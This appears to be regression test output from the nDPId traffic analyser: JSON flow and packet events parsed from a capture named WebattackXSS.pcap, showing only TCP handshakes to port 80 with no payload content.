+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348012728,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348012728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbdAAD4GlBmsEAABwKgKMojoAFBoxNXMAAAAAKACchCxggAAAgQFtAQCCAoBPOR7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":2,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiOhwV55UaMTVzaAScSDp3wAAAgQFtAQCCAoD5rXvATzkewEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":3,"flow_last_seen":1499348012729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348012729,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbhAAD4GlCCsEAABwKgKMojoAFBoxNXNcFeeVYAQAOWI5wAAAQEICgE85HsD5rXv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348015250,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348015250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SaJAAD4GfC6sEAABwKgKMokCAFA1NK9QAAAAAKACchAI\/gAAAgQFtAQCCAoBPObyAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":2,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348015250,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiQJJKiEWNTSvUaAScSDjTwAAAgQFtAQCCAoD5rhmATzm8gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":3,"flow_last_seen":1499348015251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348015251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SaNAAD4GfDWsEAABwKgKMokCAFA1NK9RSSohF4AQAOWCVwAAAQEICgE85vID5rhm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348016526,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348016526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82X9AAD4G7FCsEAABwKgKMokQAFAj2zFPAAAAAKACchCXDAAAAgQFtAQCCAoBPOgwAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":2,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348016526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiRBmO\/1xI9sxUKAScSB2swAAAgQFtAQCCAoD5rmkATzoMAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":3,"flow_last_seen":1499348016526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348016526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02YBAAD4G7FesEAABwKgKMokQAFAj2zFQZjv9coAQAOUVugAAAQEICgE86DED5rmk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348019059,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019059,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bDdAAD4GWZmsEAABwKgKMokqAFBENIadAAAAAKACchAe0QAAAgQFtAQCCAoBPOqqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":2,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348019059,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiSoKVvNnRDSGnqAScSBh7QAAAgQFtAQCCAoD5rweATzqqgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":3,"flow_last_seen":1499348019059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bDhAAD4GWaCsEAABwKgKMokqAFBENIaeClbzaIAQAOUA9QAAAQEICgE86qoD5rwe"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348020357,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348020357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MF5AAD4GlXKsEAABwKgKMok4AFAr8NuwAAAAAKACchDgrwAAAgQFtAQCCAoBPOvuAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":2,"flow_last_seen":1499348020357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiTgvWFvMK\/DbsaAScSCVIQAAAgQFtAQCCAoD5r1iATzr7gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":3,"flow_last_seen":1499348020358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348020358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MF9AAD4GlXmsEAABwKgKMok4AFAr8NuxL1hbzYAQAOU0KQAAAQEICgE86+4D5r1i"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348021660,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348021660,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T85AAD4GdgKsEAABwKgKMolGAFAJiKL6AAAAAKACchA6egAAAgQFtAQCCAoBPO00AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":2,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiUb24raMCYii+6AScSDLWgAAAgQFtAQCCAoD5r6oATztNAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":3,"flow_last_seen":1499348021660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T89AAD4GdgmsEAABwKgKMolGAFAJiKL79uK2jYAQAOVqYgAAAQEICgE87TQD5r6o"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348024206,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348024206,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82E1AAD4G7YKsEAABwKgKMolgAFCsqjf8AAAAAKACchD\/vgAAAgQFtAQCCAoBPO+xAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":2,"flow_last_seen":1499348024206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiWCF9T2qrKo3\/aAScSB38wAAAgQFtAQCCAoD5sEkATzvsQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":3,"flow_last_seen":1499348024207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348024207,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02E5AAD4G7YmsEAABwKgKMolgAFCsqjf9hfU9q4AQAOUW+wAAAQEICgE877ED5sEk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348025497,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348025497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA856FAAD4G3i6sEAABwKgKMoluAFBIkhdSAAAAAKACchCDMQAAAgQFtAQCCAoBPPDzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":2,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiW4WAueQSJIXU6AScSDALwAAAgQFtAQCCAoD5sJnATzw8wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":3,"flow_last_seen":1499348025497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA056JAAD4G3jWsEAABwKgKMoluAFBIkhdTFgLnkYAQAOVfNwAAAQEICgE88PMD5sJn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348028117,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348028117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMomIAFDG6SLzAAAAAKACchD2jwAAAgQFtAQCCAoBPPOCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":2,"flow_last_seen":1499348028117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiYg5g7TNxuki9KAScSBAQQAAAgQFtAQCCAoD5sT2ATzzggEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":3,"flow_last_seen":1499348028118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348028118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMomIAFDG6SL0OYO0zoAQAOXfRwAAAQEICgE884MD5sT2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348029395,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029395,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DoBAAD4Gt1CsEAABwKgKMomWAFBGnvpCAAAAAKACchCePQAAAgQFtAQCCAoBPPTCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":2,"flow_last_seen":1499348029395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiZaKxK9BRp76Q6AScSCa+QAAAgQFtAQCCAoD5sY2ATz0wgEDAwc="} 